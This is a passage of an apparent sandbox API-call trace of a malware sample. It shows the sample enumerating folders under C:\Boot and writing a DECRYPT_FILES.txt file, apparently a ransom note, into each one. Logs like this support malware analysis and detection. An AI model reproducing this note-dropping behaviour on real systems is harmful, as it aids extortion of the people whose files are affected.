ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.953] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0053.953] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0053.953] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0053.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0053.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0053.954] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0053.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0053.954] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\fi-fi\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3e4 [0053.954] GetFileType (hFile=0x3e4) returned 0x1 [0053.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0053.954] GetFileType (hFile=0x3e4) returned 0x1 [0053.954] WriteFile (in: hFile=0x3e4, lpBuffer=0x21a8a78*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21a8a78*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0053.955] CloseHandle (hObject=0x3e4) returned 1 [0053.955] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0053.955] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0053.955] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\", lpFilePart=0x0) returned 0xe [0053.955] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0053.990] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.990] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0053.990] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0053.990] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0053.991] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0053.991] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0053.991] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0053.991] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0053.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0053.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0053.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0053.991] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0053.991] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\", lpFilePart=0x0) returned 0xe [0053.991] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0053.991] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.992] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0053.992] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0053.992] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0053.992] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0053.992] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0053.992] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0053.993] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0053.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0053.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0053.993] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0053.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0053.993] CreateFileW (lpFileName="C:\\Boot\\Fonts\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\fonts\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.040] GetFileType (hFile=0x408) returned 0x1 [0054.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0054.040] GetFileType (hFile=0x408) returned 0x1 [0054.041] WriteFile (in: hFile=0x408, lpBuffer=0x21b1030*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21b1030*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0054.041] CloseHandle (hObject=0x408) returned 1 [0054.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.042] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0054.042] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\", lpFilePart=0x0) returned 0xe [0054.042] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.078] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.078] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.078] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.078] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.079] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0054.079] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\", lpFilePart=0x0) returned 0xe [0054.079] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.079] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.079] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.079] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0054.079] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.079] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x1f [0054.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d260) returned 1 [0054.079] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\DECRYPT_FILES.txt" (normalized: "c:\\boot\\fr-fr\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x408 [0054.080] GetFileType (hFile=0x408) returned 0x1 [0054.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d1d0) returned 1 [0054.080] GetFileType (hFile=0x408) returned 0x1 [0054.080] WriteFile (in: hFile=0x408, lpBuffer=0x21b5190*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x16d2a8, lpOverlapped=0x0 | out: lpBuffer=0x21b5190*, lpNumberOfBytesWritten=0x16d2a8*=0x9d5, lpOverlapped=0x0) returned 1 [0054.081] CloseHandle (hObject=0x408) returned 1 [0054.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.081] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0054.081] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\", lpFilePart=0x0) returned 0xe [0054.081] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.082] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.082] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0054.082] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0054.082] FindClose (in: hFindFile=0x1a5de030 | out: hFindFile=0x1a5de030) returned 1 [0054.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d240) returned 1 [0054.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16d200) returned 1 [0054.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16d2f0) returned 1 [0054.082] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU", nBufferLength=0x105, lpBuffer=0x16cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU", lpFilePart=0x0) returned 0xd [0054.082] GetFullPathNameW (in: lpFileName="C:\\Boot\\hu-HU\\", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\hu-HU\\", lpFilePart=0x0) returned 0xe [0054.082] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x16cf90 | out: lpFindFileData=0x16cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de030 [0054.083] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.083] FindNextFileW (in: hFindFile=0x1a5de030, lpFindFileData=0x16cfe0 | out: lpFindFileData=0x16cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, 